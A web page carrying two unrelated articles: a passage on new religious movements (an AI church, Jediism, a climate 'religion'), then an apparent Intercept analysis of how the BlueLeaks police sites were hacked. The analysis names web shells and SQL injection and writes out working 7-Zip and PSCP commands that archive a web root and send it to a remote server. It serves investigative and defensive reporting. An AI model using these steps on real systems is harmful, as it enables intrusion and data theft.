And some people, like AI entrepreneur Anthony Levandowski, think their holy objective is to build a super-machine that will one day answer just as Brown’s fictional machine did. Levandowski, who made a fortune through self-driving cars, hit the headlines in 2017 when it became public knowledge that he had founded a church, Way of the Future, dedicated to bringing about a peaceful transition to a world mostly run by super-intelligent machines. While his vision sounds more benevolent than Roko’s Basilisk, the church’s creed still includes the ominous lines: “We believe it may be important for machines to see who is friendly to their cause and who is not. We plan on doing so by keeping track of who has done what (and for how long) to help the peaceful and respectful transition.”

“There are many ways people think of God, and thousands of flavours of Christianity, Judaism, Islam,” Levandowski told Wired. “But they’re always looking at something that’s not measurable or you can’t really see or control. This time it’s different. This time you will be able to talk to God, literally, and know that it’s listening.”

Reality bites

Levandowski is not alone. In his bestselling book Homo Deus, Yuval Noah Harari argues that the foundations of modern civilisation are eroding in the face of an emergent religion he calls “dataism”, which holds that by giving ourselves over to information flows, we can transcend our earthly concerns and ties. Other fledgling transhumanist religious movements focus on immortality – a new spin on the promise of eternal life. Still others ally themselves with older faiths, notably Mormonism.

Are these movements for real? Some groups are performing or “hacking” religion to win support for transhumanist ideas, says Singler. “Unreligions” seek to dispense with the supposedly unpopular strictures or irrational doctrines of conventional religion, and so might appeal to the irreligious. The Turing Church, founded in 2011, has a range of cosmic tenets – “We will go to the stars and find Gods, build Gods, become Gods, and resurrect the dead” – but no hierarchy, rituals or proscribed activities and only one ethical maxim: “Try to act with love and compassion toward other sentient beings.”

But as missionary religions know, what begins as a mere flirtation or idle curiosity – perhaps piqued by a resonant statement or appealing ceremony – can end in a sincere search for truth.

The 2001 UK census found that Jediism, the fictional faith observed by the good guys in Star Wars, was the fourth largest religion: nearly 400,000 people had been inspired to claim it, initially by a tongue-in-cheek online campaign. Ten years later, it had dropped to seventh place, leading many to dismiss it as a prank. But as Singler notes, that is still an awful lot of people – and a lot longer than most viral campaigns endure.

Some branches of Jediism remain jokey, but others take themselves more seriously: the Temple of the Jedi Order claims its members are “real people that live or lived their lives according to the principles of Jediism” – inspired by the fiction, but based on the real-life philosophies that informed it.

With those sorts of numbers, Jediism “should” have been recognised as a religion in the UK. But officials who apparently assumed it was not a genuine census answer did not record it as such. “A lot is measured against the Western Anglophone tradition of religion,” says Singler. Scientology was barred from recognition as a religion for many years in the UK because it did not have a Supreme Being – something that could also be said of Buddhism.

In fact, recognition is a complex issue worldwide, particularly since that there is no widely accepted definition of religion even in academic circles. Communist Vietnam, for example, is officially atheist and often cited as one of the world’s most irreligious countries – but sceptics say this is really because official surveys don’t capture the huge proportion of the population who practice folk religion. On the other hand, official recognition of Ásatrú, the Icelandic pagan faith, meant it was entitled to its share of a “faith tax”; as a result, it is building the country’s first pagan temple for nearly 1,000 years.

Skepticism about practitioners’ motives impedes many new movements from being recognized as genuine religions, whether by officialdom or by the public at large. But ultimately the question of sincerity is a red herring, Singler says: “Whenever someone tells you their worldview, you have to take them at face value”. The acid test, as true for neopagans as for transhumanists, is whether people make significant changes to their lives consistent with their stated faith.

And such changes are exactly what the founders of some new religious movements want. Official status is irrelevant if you can win thousands or even millions of followers to your cause.

Consider the “Witnesses of Climatology”, a fledgling “religion” invented to foster greater commitment to action on climate change. After a decade spent working on engineering solutions to climate change, its founder Olya Irzak came to the conclusion that the real problem lay not some much in finding technical solutions, but in winning social support for them. “What’s a multi-generational social construct that organises people around shared morals?” she asks. “The stickiest is religion.”

So three years ago, Irzak and some friends set about building one. They didn’t see any need to bring God into it – Irzak was brought up an atheist – but did start running regular “services”, including introductions, a sermon eulogising the awesomeness of nature and education on aspects of environmentalism. Periodically they include rituals, particularly at traditional holidays. At Reverse Christmas, the Witnesses plant a tree rather than cutting one down; on Glacier Memorial Day, they watch blocks of ice melt in the California sun.

As these examples suggest, Witnesses of Climatology has a parodic feel to it – light-heartedness helps novices get over any initial awkwardness – but Irzak’s underlying intent is quite serious.

“We hope people get real value from this and are encouraged to work on climate change,” she says, rather than despairing about the state of the world. The congregation numbers a few hundred, but Irzak, as a good engineer, is committed to testing out ways to grow that number. Among other things, she is considering a Sunday School to teach children ways of thinking about how complex systems work.

Recently, the Witnesses have been looking further afield, including to a ceremony conducted across the Middle East and central Asia just before the spring equinox: purification by throwing something unwanted into a fire – a written wish, or an actual object – and then jumping over it. Recast as an effort to rid the world of environmental ills, it proved a popular addition to the liturgy. This might have been expected, because it’s been practised for thousands of years as part of Nowruz, the Iranian New Year – whose origins lie in part with the Zoroastrians.

Transhumanism, Jediism, the Witnesses of Climatology and the myriad of other new religious movements may never amount to much. But perhaps the same could have been said for the small groups of believers who gathered around a sacred flame in ancient Iran, three millennia ago, and whose fledgling belief grew into one of the largest, most powerful and enduring religions the world has ever seen – and which is still inspiring people today.

Perhaps religions never do really die. Perhaps the religions that span the world today are less durable than we think. And perhaps the next great faith is just getting started.


Law enforcement websites hit by blueleaks may have been easy to hack

Some 270GB of police files were obtained, possibly in a single evening. Backdoor software might have had something to do with it.

August 19, 2020

by Micah Lee

The Intercept

Whoever broke into 251 law enforcement websites and obtained the BlueLeaks trove of documents appears to have reused decades-old software for opening “backdoors” in web servers.

The use of the widely available backdoors provides evidence that the hacktivist who compromised the sensitive sites, including fusion centers linked to federal agencies, didn’t need to use sophisticated digital attack methods because the sites were not very secure.

The backdoors appear among files in the roughly 270-gigabyte BlueLeaks dump but seem to originate not from law enforcement entities, like most of the documents, but from the hacker, who appears to have left behind a few tools in the leaked data. Other leaked files provide further clues about how the hacktivist operated.

Two of the files are a type of malware known as “web shells”: malicious files that, when placed on a server, provide an online entry point through which a hacker can download and upload files or issue commands of their choosing. These backdoors appear with BlueLeaks material obtained from the website of the Arizona High Intensity Drug Trafficking Area, which is basically Arizona’s fusion center for the drug war. One is called “ntdaddy.aspx” and the other is “blug.aspx.” Their presence has implications for all the affected sites, which were operated by the same company and appear to have run the same software.

Two other files appear to have aided the exfiltration of documents from the servers. The Arizona HIDTA files included a copy of a program for securely transferring files across the internet, which could have been used to move files onto a computer controlled by the hacker. Files for another site, ICEFISHX, Minnesota’s police fusion center, included a copy of a program for compressing files, which would make it much faster for the hacker to upload hundreds of gigabytes of data to their own computer.

All four of the files appear to be circumstantially linked to the hacker through their digital time stamps, which indicate they were created the evening of Saturday, June 6 —making them among the most recent data released in BlueLeaks. Basically, this time likely corresponds to the moments before the hacktivist exfiltrated the data for this leak.

The files do not provide any information about the identity of the hacker, how the hacker protected their anonymity, what infrastructure they used to exfiltrate data, or what vulnerability they exploited to initially hack these websites. But they do indicate that, instead of developing custom malware, the hacker pulled off-the-shelf software easily available to anyone online and that anti-virus software flags as malicious.

The BlueLeaks Data

The Arizona HIDTA and Minnesota ICEFISHX websites, as well as the rest of the hacked websites included in BlueLeaks, were built and hosted by the Texas web development firm Netsential. They all run the same web application, hosted on Microsoft’s Windows operating system; on Microsoft’s web server, Internet Information Services, or IIS; and on a Microsoft web programming framework, ASP.NET.

The web app’s data is also stored using Microsoft software, in a database system known as Access. For ICEFISHX, data lived in the file “icefishx.mdb” on its server. The database included information about 6,120 registered users, the content of 3,151 bulk emails that the fusion center sent out, as well as metadata about hundreds of documents. Arizona HIDTA’s data was in a file called ”azhidta.mdb” and, among other things, included metadata describing thousands of items like laptops, furniture, and surveillance body wires in the HIDTA’s inventory.

BlueLeaks contains a separate folder for each hacked website. The files for the Arizona HIDTA website include what appears to be the original source code for the website, written in ASP.NET, along with the malicious web shells, “ntdaddy.aspx” and “blug.aspx,” as well as images, JavaScript files, and other files that make up the code of Netsential’s web app. It also includes all of the PDFs and Microsoft Office documents that were uploaded into the web app. While it does not directly include “azhidta.mdb,” the Access database, it does include references to the database, along with 220 spreadsheets, each one representing a table — that is, a collection of related, structured data — exported from the database. (This is true for most of the other hacked websites included in BlueLeaks, though some don’t contain all of the web app’s source code.)

According to historical domain name records, on July 17, almost a month after the hack was made public, Arizona HIDTA migrated their website away from Netsential’s Houston server and into the website hosting service Squarespace. ICEFISHX still uses Netsential’s web application. (Netsential stated on its website that it was not responding to requests for comment from the press. It did not respond to a message from The Intercept.)

SQL Injection

There is no legitimate reason for the “ntdaddy.aspx” and “blug.aspx” web shells to exist among Arizona HIDTA’s files — these were definitely traces left over from a hack — but it’s not clear exactly how they got onto the server to begin with. What was the initial attack vector used to compromise the server? I couldn’t find any direct evidence; there’s no mention of “ntdaddy” in log files, for example. But my best guess is that the hacker added the web shells using a type of web hacking called “SQL injection,” in which an attacker is able to modify the instructions sent to the database powering a website.

The Open Web Application Security Project, a nonprofit dedicated to improving the security of web software, puts injection attacks at the top of its list of security risks for web applications. SQL, short for Structured Query Language, is used by programmers to read and update many types of databases, including the Microsoft Access databases used by all of the hacked websites in the BlueLeaks dump. A SQL injection attack is when a hacker is able to “inject” their own SQL code inside a query, tricking the database into responding with different information or different actions than the website programmer intended. This is typically accomplished by visiting a maliciously devised web address or submitting specially crafted information into a web form and  exploiting a flaw in how the website creates SQL queries to obtain particular information on behalf of particular users. On a badly configured web server, it would be possible (using the Access SQL query SELECT.INTO) for a hacker who has discovered a SQL injection vulnerability to create new files on the server and fill them with whatever information they want, such as code that makes up a web shell.

The best way to write software that isn’t vulnerable to SQL injection is to use a technique called prepared statements. Based on my analysis of the web app’s source code, Netsential’s web app (as it existed in the leaked files) does not use this technique. With prepared statements, the programmer narrowly determines ahead of time which part of a SQL query will change in response to the user and which part will always remain the same. Instead, the Arizona HIDTA’s website source code, as well as the code from the rest of the hacked website in BlueLeaks, builds its SQL queries in an insecure way: only trying to mitigate SQL injection using a poorly implemented and error-prone technique known as “escaping,” which attempts to essentially neutralize malicious user input before using that input to build SQL queries. Another best practice is to use a “safe API” for interfacing with the database. Netsential’s web app doesn’t appear to do this either; every time it needs to interface with the database, the code executes a SQL query directly.

Because of this, it’s likely that Netsential’s web app has SQL injection vulnerabilities. To be clear, I haven’t discovered any myself. But the fact that the web app uses such bad security practices around SQL, and that I counted 1,931 places in the code where a SQL query gets executed, I think that it’s probable that mistakes were made in at least some of these places.

And, unless Netsential has fixed these potential vulnerabilities since the BlueLeaks data was made public and pushed updates to all of the websites still running its code, it’s likely that these law enforcement websites, including major police fusion centers in use today, are still vulnerable to SQL injection.

Web Shells

I wanted to see what these web shells could do, so I set up a Windows virtual machine, installed an IIS web server, and copied both the ntdaddy.aspx and blug.aspx files from the Arizona HIDTA website into it. I also disabled the built-in Windows virus and threat protection; otherwise, Windows blocks both of these web shells from executing.

The “NTDaddy” web shell was first developed at least 18 years ago by a hacker named “obzerve” who worked with the hacker group fux0r inc. It’s widely available, including in this GitHub repository containing a collection of web malware. If you scan the ntdaddy.aspx file on VirusTotal, 36 out of 59 anti-virus programs flag it as malicious, generally classifying it as a web server backdoor.

But while testing out this web shell, I hit a problem. NTDaddy was coded in a language called classic ASP, Microsoft’s first server-side scripting language from 1996. Classic ASP files end in “.asp,” like ntdaddy.asp. In 2002, Microsoft released a more modern web application framework called ASP.NET, making classic ASP obsolete. ASP.NET files end in “.aspx,” like ntdaddy.aspx. Even though NTDaddy was coded in classic ASP, its filename on the Arizona HIDTA website used an ASP.NET filename: ntdaddy.aspx.

When I load ntdaddy.aspx in a browser, it responds with an error, which is to be expected because it’s trying to run a classic ASP code as if it were ASP.NET code.

ntdaddy-aspx-errorNTDaddy error message when using .aspx file extension Screenshot: Micah Lee

It’s likely that the Arizona HIDTA’s IIS server wasn’t configured to execute classic ASP code at all, that this web shell simply didn’t work, and that the hacker didn’t bother deleting this file.

If I rename the file to ntdaddy.asp and load it in a browser, I can then explore the files on the server, upload new files, or issue commands:

The blug.aspx file contained a web shell simply called “ASPX Shell,” developed in 2007 by a hacker called “LT” — only the version on Arizona HIDTA’s website didn’t include the comment at the top of the file that gives LT credit, and lists the 2007 date.

Like NTDaddy, ASPX Shell is widely available and can be found in that GitHub repository. If you scan blug.aspx in VirusTotal, 15 out of 59 anti-virus programs flag it as malicious, generally classifying it as a web server backdoor.

But unlike NTDaddy, ASPX Shell works much better because it uses ASP.NET, not classic ASP (the malware itself was written in the C# programming language). It allows you to browse the file system, upload files, and run commands as if you were sitting in front of the Windows server with a command prompt open. Basically, it allows you to do anything that the IIS user on the Windows server has permission to do, including access all of the data related to the website.

However, when I try uploading a file to the folder where website files are stored (in my case, C:\inetpub\wwwdata), I get an unauthorized access error; perhaps my IIS server in Windows 10 Pro is more securely configured than Netsential’s servers. To more accurately replicate the Netsential servers, I reduced the permissions on that folder to allow my IIS user to save new files there.

Compression and Exfiltration

In addition to the web shells, two open-source Windows tools were included with the BlueLeaks files, both with June 6 time stamps:

ICEFISHX’s folder has a file called 7z.exe, a copy of the popular file compression and extraction program 7-Zip.

Arizona HIDTA’s folder has a file called pscp64.exe, a program that comes with PuTTY, a popular Windows tool for securely logging into and copying files to remote servers, typically those running the     Linux operating system.

Using ASPX Shell, a hacker could run 7-Zip to compress all of the data they wished to exfiltrate, and then use PuTTY to copy it to a remote server controlled by the hacker.

So I decided to try this. In my first attempt at running 7z.exe, it gave me an error message saying that the file 7z.dll was missing. Possibly, the hacker uploaded this DLL file as well, but for whatever reason did not end up including it in the BlueLeaks data. So I downloaded a fresh copy of 7-Zip and grabbed the version of 7z.exe and 7z.dll from there.          Then, I ran this command in my web shell:

7z.exe a police_data.7z c:\inetpub

This uses 7-Zip to create a new archive called police_data.7z, and it adds all of the files in the C:\inetpub folder to that archive.

aspxshell-7zipASPX Shell, compressing files with 7-Zip Screenshot: Micah Lee

Now that I’ve created police_data.7z, I could just download the archive using my web browser. But instead I decided to try using PuTTY to exfiltrate the data to a remote server, which is what I’m guessing the BlueLeaks hacktivist did.

I created a new cloud server running Debian GNU/Linux with the IP address, and on that server I created a new user called “exfiltrator” with the password “89qzR2Y8KbFj”. Then, in ASPX Shell, (after a bit of troubleshooting) I ran this command:

pscp64.exe -batch -hostkey 05:d3:9a:ce:59:e6:28:e4:17:2c:da:69:22:53:04:14 -pw 89qzR2Y8KbFj police_data.7z exfiltrator@

This uses PuTTY’s secure copy (SCP) program to copy the police_data.7z file to my Debian server. The command includes the username, password, and IP address of my server. After running this command, a copy of the file was exfiltrated to my server. (I’ve already deleted that cloud server, in case you get any ideas.)

Hacking 251 Websites

To recap, here’s how I believe these websites were hacked:

The hacktivist found a SQL injection vulnerability, and then used it to create a web shell.

Using the web shell, they uploaded tools: 7-Zip and PuTTY.

They used 7-Zip to compress all of the data they wanted to exfiltrate.

They used PuTTY to copy this hacked data to a remote server they controlled.

To be clear, I’m not sure that this is what the BlueLeaks hacker actually did or not. I have no inside knowledge; this is just my best guess based on the available evidence.

And because all of these websites run Netsential’s custom, insecure web app code, this process would likely be the same to hack any of them. In fact, it could even be automated to save time, allowing the hacker to compromise all 251 websites and exfiltrate all of the data from them in a single Saturday evening.

For the record: I’m an adviser for DDoSecrets, the transparency collective that received the BlueLeaks data — from a source identifying with the hacktivist collective Anonymous — and then published it.















No responses yet

Leave a Reply